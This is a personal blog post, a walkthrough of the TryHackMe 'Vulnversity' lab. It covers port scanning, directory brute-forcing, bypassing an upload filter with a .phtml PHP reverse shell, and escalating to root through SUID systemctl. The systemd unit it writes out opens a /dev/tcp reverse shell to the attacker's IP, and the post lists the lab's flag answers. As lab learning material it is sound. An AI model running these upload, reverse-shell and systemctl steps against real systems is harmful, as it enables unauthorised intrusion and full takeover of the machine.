What's the blog about?

Hello! Welcome to BlackWolf's Blog page

The aim of this blog is for me to annotate all of my work, ranging from book reviews, malware disassembly, projects I've been working on, what materials I've used to study. In short, this blog post is a collection of all the projects I've worked on, what books I've read, what courses I've been taking. As well as small guides on each intentionally vulnerable machines that I've solved.

This blog page also provides a multitude of benefits besides me just having my work visible. For the world of IT, documentation is of huge importance. This will drastically deepen my documentation skills and habits. As well as permitting me to show what work I may have done and showcase it to all potential future employers. Because if it isn't documented, it never happened.

BlackWolf's TryHackMe Writeup [Vulnversity]

    

 Offensive Security
TryHackMe's Vulnversity


"No matter where you are, the skills and requirements for a penetration tester will be the same. You’ll be required to have a good understanding of various aspects within information security including web applications, networks and sometimes even low-level technology like assembly. A good understanding of these technologies is essential to learning how to exploit them.

The aim of this path is to make you ready for real-world penetration testing by teaching you how to use industry-standard tools along with a methodology to find vulnerabilities in machines. By the time you complete this path, you will be well prepared for interviews and jobs as a penetration tester. To complete this path you should have a basic to a medium understanding of computing.

You can use this pathway to help you acquire the skills needed to go and get certified by well-known certifiers in the security industry."
- TryHackMe, 2020




What is TryHackMe and why should I look into it?


Well if the name doesn't give it away, TryHackMe is a small little organisation that has created a series of courses for those of which want to get into penetration testing. It provides the means to learn and guides those who don't quite know where to get started and shows them how to use existing tools.


A series of opensource boxes, which are vulnerable machines that have services running versions that are vulnerable to certain attacks. Have been supplied, the goal of these machines are to find these vulnerabilities and execute the correct vulnerability and escalate privileges to "crack the box". This is to simulate real-world machines that may have services running on potentially vulnerable versions.


TryHackMe is an academy for all those who seek to get into cybersecurity, once you sign up for their course, which they offer for $10 USD ($14~ AUD for myself). Once you pay for this surprisingly cheap subscription you're presented with a choice. 


I elected to go with the Pathways path, deciding to have a crack at Series later down the track. 



Learning Pathway's
Select a pathway and structure your learning

Looking through all of the potential courses I had decided upon following the Offensive Pentesting learning path. As this is being written up I haven't gone ahead and done anything besides the tutorial so this little write-up will be as raw as it's happening live.

Getting Started

Let's get started with a few easy rooms which will give you practice in the following areas:
  • Active Reconnaissance
  • Vulnerability Scanning
  • Privilege Escalation
  • Web Application Attack



Having finished the Tutorial previously this post will be a writeup on the Vulnversity.

The Tasks 



The video is a step by step guide to the Vulnversity course, watching only the first few minutes then jumping ahead I've decided not to watch the clip as I'd like to see if I can complete the box without any hints nor a walkthrough. Whilst following the steps of course, so, let's get straight into it.




1.  The first and foremost step is deploying our box, which all we needed to do was click the button and our machine will start right up!


Once we deploy our machine lets go ahead and start our attack box, the attack box is a virtual machine which TryHackMe has cleverly integrated into the web, creating a live cluster which we can interact with. 

Once it's finished deploying, the attackbox should look like something along the lines of this

You can choose either to use TryHackMe's virtual machine or you can boot up your own machine, preferably running Kali Linux. Connecting to the machine using OpenVPN. To find your .ovpn file visit https://tryhackme.com/access 



You don't need to do these steps if you're using TryHackMe's web integrated VM, but if you want to use your own machine you'll need to follow these steps if you want to connect to the vuln box.
    1. Download your OpenVPN configuration pack.
    2. Run the following command in your terminal: sudo apt install openvpn
    3. Locate the full path to your VPN configuration file (normally in your ~/Downloads folder).
    4. Use your OpenVPN file with the following command: sudo openvpn /path/to/file.ovpn
    Once you've followed the above steps your terminal should look like this:

    If you're running this at a school or perhaps a workplace they may have UDP or TCP blocked, you're able to change which protocol is being used, I had to change mine when not using my home network. Else if it's not blocked you should be fine.


    And once you've connected to the Box, refresh the webpage we had a look at earlier and the 'Connected' status will show that we've connected and we're ready to begin this box!

    (by the time anyone sees this writeup the virtual IP would've expired)




    And now we begin the reconnaissance stage. I'll be supplying screenshots from the web integrated virtual machine whilst simultaneously carrying this out on my laptop running Kali.
    First, we'll be using a tool called Nmap, which stands for a network mapper. nmap is a commonly utilised tool

    nmap -sV 10.10.125.102

    Running the above command will give us this response (shown on left)
    Here we can see the ports 21, 22, 139, 445, 3128 and 3333 are open. Fingerprinting these we can see the services running on these ports.




    1.      Scan the box, how many ports are open?

    With the ports: 
    • 21 
    • 22 
    • 139 
    • 445 
    • 3128
    • 3333
    The answer: Six

    2. What version of squid proxy is running on the machine?


    looking closer at the supplied screenshot we can see on port 3128, a service called Squid HTTP Proxy, which through the mystical powers of deduction we can tell that the service version it's running on is

    The answer: 3.5.12

    3. How many ports are scanned with the flag -p-400?

    The -p- flag specifies a port range, in this case, 400 is parsed as the parameter, running it all ports on 400 and under will be displayed, which would be 21, 22 and 139. So, nmap will scan 400 ports to see if they're open.
    The answer: 400

    4. Using the nmap flag -n what will it not resolve?

    This was a bit of an interesting one I scoured through the entirety of the nmaps 'man' page [man is short for manual] and could not find the -n flag and see what it does, went for the hint which was [IP to hostname] which immediately my mind goes to "oh, DNS"
    The answer: DNS

    5. What is the likely operating system on this machine?

    If we refer back to the supplied photo we can see that that Service Info provides us with Linux, looking at port 3333 running Apache HTTPD we can see that the operating system it is running on is ubuntu
    The answer: Ubuntu

    6. What port is the web-server running on?

    Casting our scornful gaze once more to the screenshot of the terminal we can see that the service Apache HTTPd which is a webserver, is running on port 3333
    The answer: 3333

    And that is all for the reconnaissance section! reconnaissance, be it either passive or active, it is one of the most critical stages to penetration testing, falling short on this, one would not know where to poke and prod, nor would they know where to set their sights upon. Make sure you properly follow through on executing this. As it's difficult to begin attacking if you don't know what or where you're attacking.

    Using a fast directory discovery tool calledGoBuster you will locate a directory that you can use to upload a shell to.

    How GoBuster works. When given a URL and a supplied wordlist, it'll then run every word within that wordlist and then pass the URL + that word and see if it returns with a valid response. If it doesn't it'll move to the next but if the response is valid it'll list out every valid directory.

    Installing GoBuster, run sudo apt-get install gobuster this'll install the tool and add it to your /bin allowing you to run the tool from any directory within your attackbox.

    To get started, you will need a wordlist for GoBuster (which will be used to quickly go through the wordlist to identify if there is a public directory available. If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.


    gobuster dir -u http://10.10.37.228:3333 -w /usr/share/wordlists/dirbuster

    This is the result of the command, here we can see the IP we passed as a URL which doesn't have to go through DNS conversion. But it does need the 'http://' in front of it. So it should look like this http://10.10.37.228 

    Since we're looking at scanning the Apache server which is a web server, it's running on port 3333 so we point it at that port, adding:3338 following the URL. So it looks something like http://10.10.37.228:3333

    Now we can see the result of its directory brute-forcing. And the directories that came back as a valid directory are:
    /images, /css, /js and /internal. All of these are tagged with the [301] status

    Now, looking at these directories we will go and browse to one that strikes us as interesting, one that piques my attention is the /internal directory. So we'll browse there by opening firefox and browsing to http://10.10.37.228:3333/internal



    Oh! good fun! an upload function, immediately my mind jumps to uploading a  .PHP script and perhaps browsing to it in /images for it to be executed and seeing if we the uploaded shell will hopefully be executed by browsing this will permit us to execute commands on the Apache HTTPd server allowing, a prime example of how to abuse improper sanitisation.

    first, we must answer the only question in this section

    1. What is the directory that has an upload form page?

    We already know the answer to this as we browsed to the /internal URL and so the upload page so it'll be /internal.
    The answer: /internal




    Now here begins the part where things get fun, we've found an upload function which may be improperly sanitised which we'll look into. If it is improperly sanitised it'll permit us to upload certain files, and if we can browse to these files we'll be able to pop a shell.

    A shell is basically a payload that allows for us to execute commands or create a TCP connection, or even a reverse_tcp connection where the client connects to use, this is called a reverse_shell 

    To do this, we'll be using a tool called BurpSuite. An extremely powerful tool utilised by both professional penetration testers and web developers. To run burpsuite run either Burp or burpsuite in your terminal. And after clicking through and starting a temporary project you should be presented with this:



    We're going to use Intruder (used for automating customised attacks). To begin, make a wordlist with the following extensions in:

    Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.

    Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:


    1. Run this attack, what extension is allowed?

    Annoyingly enough when executing the attack all of the payload types return a 200 status but after trial and error
    The answer: .phtml



    Now that we know what extension we can use for our payload, we can progress.

    We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you'll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

    A GitHub repository written by pentestmonkey provides us with the necessary php script
    Download the following reverse PHP shell here.

    To gain remote access to this machine, follow these steps:

    1.    Edit the php-reverse-shell.php file and edit the ip to be your tun0 ip (you can get this by going to http://10.10.10.10 in the browser of your TryHackMe connected device).
    2.    Rename this file to php-reverse-shell.phtml, as if we left it as .PHP we wouldn't be able to upload

    3.    We're now going to listen to incoming connections using netcat. Run the following command: nc -lvnp 1234

    4.    Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml - This will execute your payload

    5.    You should see a connection on your netcat session


    Here we vim our shell and change the $ip to our own so we can create a reverse_tcp connection through the phtml shell. This is rather important as we need to connect back to use, hence the reverse shell.



    Here we're using Netcat to create a shell, ignore the incorrect port, we used port 1234 on the shell so we have to use the same port on netcat if we want to create a listener for that. Netcat is an extremely powerful tool which is frequently utilised, highly recommend looking further into it if you've got the time.

    And voila! we have a shell!

    Now let's see who we are by running whoami, which shows we're www-data. Not quite useful, let's see who's on the machine by running awk -F: '{print $1}' /etc/passwd, by running this command we can just see the list of users and not and an entire block of information

    Looking at all the names on the right we see a few of interest but to cut to the chase the one we're really wanting to look at is Bill. So cd'ing into /home/bill and looking at the contents of his home directory we find the user.txt flag!

    1. Which user who manages the webserver?

    We'll after looking through all the interesting users we were able to figure out that the user who manages the webserver was in fact bill the sly bugger.
    The answer: Bill

    2. What is the user flag?

    Printing out the user.txt by running cat user.txt whilst in the /home/bill directory we know the flag
    The answer: 8bd7992fbe8a6ad22a63361004cfcedb



    Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

    In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

    For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadower's file that you do not have access to, root does, so it has root privileges to make the right changes.

    Now, moving on the first question was intriguing, I scoured the entirety of /usr/bin and /usr/ and couldn't find anything of particular interest, and so failing that I went for the hint. Which was: find / -user root -perm -4000 -exec ls -ldb {} \; going ahead and executing this we're thrown a huge terminal response.
    Looking through this rather exciting response we can see all the services running at root privileges, most of which were given "permission denied"

    but looking at a few running within /bin/ we see a few interesting ones.

    And immediately my eyes go straight to /bin/systemctl which seems to be of interest.
    First we need to find a directory that we the appropriate permissions to do this, so lets cd into /home/bill if we try mkdir filename we see that we don't have the correct permissions so let's run ls -la

    1. Search for all SUID files. What file stands out?

    Having just executed the above command where we find the user root with the permission 4000 we scavenge through the large response (a lot more not shown) and then we found -rwsr-xr-x 1 root root 659856 /bin/systemctl
    The answer: /bin/systemctl

    Alright, so knowing which service we, a user, can execute with root privileges how can we abuse this cron job? Now, as I'm not entirely familiar with the syntax for bash scripts I'll quickly google how to privilege escalate and see if we can become root on this machine and grab the root flag. For reference, I'll be looking at this write-up but I will detail what I do. 


    alright so on our attackbox we've created a file called root.service and this is what it should pertain:
    [Unit]
    Description=On our merry way to obtain root!


    [Service]
    Type=simple
    User=root
    ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.25.93/9999 0>&1'


    [Install]
    WantedBy=multi-user.target
    first, we type touch root.service and then we vim the file and type in the above, you guys should be able to copy and paste it in. And now all we need to do is get this onto the target system which hopefully we'll do using netcat. Following this netcat file transfer guide 

    Now we need to find a directory that has the appropriate permissions to do this, so lets cd in /home/bill if we try mkdir [filename] we see that we don't have the correct permissions so let's run ls -la

    Cool, so now we can see every folder within the root directory and we can see all perms, now to find one where everyone has read, write and execute permissions.  

    Easy, now let us test to see if we have the appropriate permissions by creating a folder. I named mine something tediously long for fun but go ahead and name it anything you please
    Looking closely we see that /tmp & /vmlinuz has rwx (read, write and execute) perms setup for all, so let's go ahead and cd into tmp.  

    And would you look at that! We created a folder, now lets cd into that folder and get down and dirty

    On the box we'll run this command:
    nc -l -p 2222 > root.service Once you've gone ahead and run the above on the target machine, switch to a new terminal on your attack box and run:

    nc -w 3 10.10.195.197 2222 < root.service And once we execute that the netcat listener and sender will both drop and if we ls check again it'll be there!

    Payload Execution:
    Before we can execute our root.service file, we need to place it onto the target file system if it’s not there already. Once that is done, we just need to use systemctl to start our custom service. To do this, we first need to set up our listener. So let's go back to our attackbox and start a Netcat listener on port 9999
    nc -lvp 9999

    Once we do that, we need to make sure we specify our root.service file location in our systemctl command arguments. So lets go ahead and create a symbolic link by typing/bin/systemctl enable /tmp/netcat/root.service
    Once we've typed that on the box we should see this small message (shown on the left)
    If you see this message then you've done all the above steps correctly, if not something somewhere went wrong. Now that we've created a symbolic link lets start systemctl and get a root shell. Do this by typing/bin/systemctl start root Now after all this we should have a root shell back on our other attackbox terminal where we were running the netcat listener for the root.service bash script that we grabbed. If all was followed you should see the terminal saying you're root and then you just need to cd into the root directory and the root.txt flag will be sitting there waiting to be grabbed.

    And there we have it, now to answer the last remaining question before we've finished the box.












    1. Become root and get the last flag (/root/root.txt)

    Following all the last steps as well as shown in the provided screenshot we know that
    The answer: a58ff8579f0a9270368d33a9966c7fd5


    And voila! you've done the very first box on TryHackMe! I'm not too sure about whoever is reading this but I had an insane amount of fun doing this and I'm honestly growing quite fond of typing all this up, as well as doing this will greatly help for the OSCP. So if you're planning on getting that certificate you need to have a write up of every box you do, if you want to take it I highly recommend doing the same and creating your very own writeup.

    Good luck to you on your own penetration testing journey, don't be thrown off by this if it looks difficult. Go back through the tools, look at how they work. If you feel as if you're lacking the fundamentals I highly recommend at least having a strong grasp on networking as 80% of what we just did here revolves around networking, reverse_tcp connections. Using netcat to tunnel between two machines and transferring files, opening up ports and so forth.

    The tools we had used to complete this box:
        - nmap
        - GoBuster
        - burpsuite
        - netcat

    Best of luck to all!

    Regards,
    - Blackwolf
                                                                                                                                             
    11/24/2020

    Comments

    Post a Comment